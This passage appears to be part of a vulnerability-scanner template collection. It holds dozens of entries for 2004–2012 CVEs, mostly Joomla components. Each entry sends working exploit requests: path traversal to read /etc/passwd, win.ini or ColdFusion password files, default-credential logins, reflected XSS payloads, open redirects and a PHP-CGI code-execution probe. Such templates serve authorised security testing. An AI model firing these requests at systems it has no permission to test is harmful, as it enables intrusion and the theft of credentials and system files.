LFI","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["rdspassword=","encrypted="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2050","info":{"name":"Joomla! Component MS Comment 0.8.0b - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1471","info":{"name":"Joomla! Component Address Book 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0942","info":{"name":"Joomla! Component com_jvideodirect - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1875","info":{"name":"Joomla! Component Property - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0943","info":{"name":"Joomla! Component com_jashowcase - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2918","info":{"name":"Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0982","info":{"name":"Joomla! Component com_cartweberp - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1531","info":{"name":"Joomla! Component redSHOP 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2680","info":{"name":"Joomla! Component jesectionfinder - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1717","info":{"name":"Joomla! Component iF surfALERT 1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1955","info":{"name":"Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2037","info":{"name":"Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1340","info":{"name":"Joomla! Component com_jresearch - 'Controller' Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1602","info":{"name":"Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4769","info":{"name":"Joomla! Component Jimtawl 1.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1474","info":{"name":"Joomla! Component Sweetykeeper 1.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2920","info":{"name":"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1308","info":{"name":"Joomla! Component SVMap 1.1.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1535","info":{"name":"Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2122","info":{"name":"Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1312","info":{"name":"Joomla! Component News Portal 1.5.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0759","info":{"name":"Joomla! Plugin Core Design Scriptegrator - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0219","info":{"name":"Apache Axis2 Default Login","severity":"critical"},"requests":[{"raw":["POST /axis2-admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginUsername={{username}}&loginPassword={{password}}\n","POST /axis2/axis2-admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserName={{username}}&password={{password}}&submit=+Login+\n"],"payloads":{"username":["admin"],"password":["axis2"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","words":["

    Welcome to Axis2 Web Admin Module !!

    "]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4617","info":{"name":"Joomla! Component JotLoader 2.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1217","info":{"name":"Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1870","info":{"name":"ListSERV Maestro <= 9.0-8 RCE","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/lui/","{{BaseURL}}/hub/"],"extractors":[{"type":"regex","regex":["LISTSERV Maestro\\s+9\\.0-[123456780]","LISTSERV Maestro\\s+[5678]","Administration Hub 9\\.0-[123456780]","Administration Hub [5678]"]}]}]},{"id":"CVE-2010-1658","info":{"name":"Joomla! Component NoticeBoard 1.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1476","info":{"name":"Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4231","info":{"name":"Camtron CMNC-200 IP Camera - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1954","info":{"name":"Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1314","info":{"name":"Joomla! Component Highslide 1.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1982","info":{"name":"Joomla! Component JA Voice 2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1540","info":{"name":"Joomla! Component com_blog - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1714","info":{"name":"Joomla! Component Arcade Games 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4282","info":{"name":"phpShowtime 2.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1478","info":{"name":"Joomla! Component Jfeedback 1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1495","info":{"name":"Joomla! Component Matamko 1.01 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2682","info":{"name":"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4977","info":{"name":"Joomla! Component Canteen 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5028","info":{"name":"Joomla! Component JE Job 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1472","info":{"name":"Joomla! Component Horoscope 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1313","info":{"name":"Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2036","info":{"name":"Joomla! Component Percha Fields Attach 1.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1302","info":{"name":"Joomla! Component DW Graph - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1957","info":{"name":"Joomla! Component Love Factory 1.3.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1956","info":{"name":"Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1980","info":{"name":"Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1469","info":{"name":"Joomla! Component JProject Manager 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2033","info":{"name":"Joomla! Percha Categories Tree 0.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4719","info":{"name":"Joomla! Component JRadio - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1491","info":{"name":"Joomla! Component MMS Blog 2.3.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1719","info":{"name":"Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1718","info":{"name":"Joomla! Component Archery Scores 1.0.6 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1657","info":{"name":"Joomla! Component SmartSite 1.0.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1461","info":{"name":"Joomla! Component Photo Battle 1.0.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1470","info":{"name":"Joomla! Component Web TV 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1473","info":{"name":"Joomla! Component Advertising 0.25 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1952","info":{"name":"Joomla! Component BeeHeard 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1306","info":{"name":"Joomla! Component Picasa 2.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1354","info":{"name":"Joomla! Component VJDEO 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1429","info":{"name":"Red Hat JBoss Enterprise Application Platform - Sensitive Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/status?full=true"],"matchers-condition":"and","matchers":[{"type":"word","words":["JVM","memory","localhost/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1056","info":{"name":"Joomla! Component com_rokdownloads - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2259","info":{"name":"Joomla! Component com_bfsurvey - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2004-1965","info":{"name":"Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?redirect=http%3A%2F%2Fwww.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2004-0519","info":{"name":"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4253","info":{"name":"MySQLDumper 1.24.4 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-6499","info":{"name":"WordPress Plugin Age Verification v0.4 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1\nHost: {{Hostname}}\n\nredirect_to=http://www.interact.sh&age_day=1&age_month=1&age_year=1970\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-4982","info":{"name":"Forescout CounterACT 6.3.4.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/login?a=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2012-4547","info":{"name":"AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1823","info":{"name":"PHP CGI v5.3.12/5.4.2 Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2012-4940","info":{"name":"Axigen Mail Server Filename Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\\..\\..\\windows\\win.ini","{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\\..\\..\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2012-0996","info":{"name":"11in1 CMS 1.2.1 - Local File Inclusion (LFI)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1226","info":{"name":"Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4032","info":{"name":"WebsitePanel before v1.2.2.1 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /Default.aspx?pid=Login&ReturnUrl=http%3A%2F%2Fwww.interact.sh HTTP/1.1\nHost: {{Hostname}}\nCookie: UserCulture=en-US; .WEBSITEPANELPORTALAUTHASPX=\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\nContent-Type: application/x-www-form-urlencoded\n\nctl03%24ctl01%24ctl00%24txtUsername={{username}}&ctl03%24ctl01%24ctl00%24txtPassword={{password}}&ctl03%24ctl01%24ctl00%24btnLogin=+++Sign+In+++&ctl03%24ctl01%24ctl00%24ddlLanguage=en-US&ctl03%24ctl01%24ctl00%24ddlTheme=Default\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-0901","info":{"name":"YouSayToo auto-publishing 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/yousaytoo-auto-publishing-plugin/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-5913","info":{"name":"WordPress Integrator 1.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wp-integrator/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Wordpress 